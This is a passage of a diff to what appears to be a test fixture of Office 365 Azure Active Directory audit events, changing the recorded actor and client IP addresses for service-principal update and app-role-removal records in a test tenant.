":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"b2cc2456-5ac5-4399-b960-82a40036476f\",\"ModifiedProperties\":[{\"Name\":\"Included Updated 
Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -984,9 +984,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-09T15:33:26",
 "ExtendedProperties": [
 {
@@ -1201,7 +1201,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464425\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.
0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7f09b681-251f-4ff0-97cf-5247891b6981\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 
Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464425\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"V
alue\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7f09b681-251f-4ff0-97cf-5247891b6981\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -1231,9 +1231,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-09T15:34:06",
 "ExtendedProperties": [
 {
@@ -1467,7 +1467,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464434\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"d8a2ae24-a752-4f8e-adca-c57189a76a71\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464434\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"d8a2ae24-a752-4f8e-adca-c57189a76a71\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 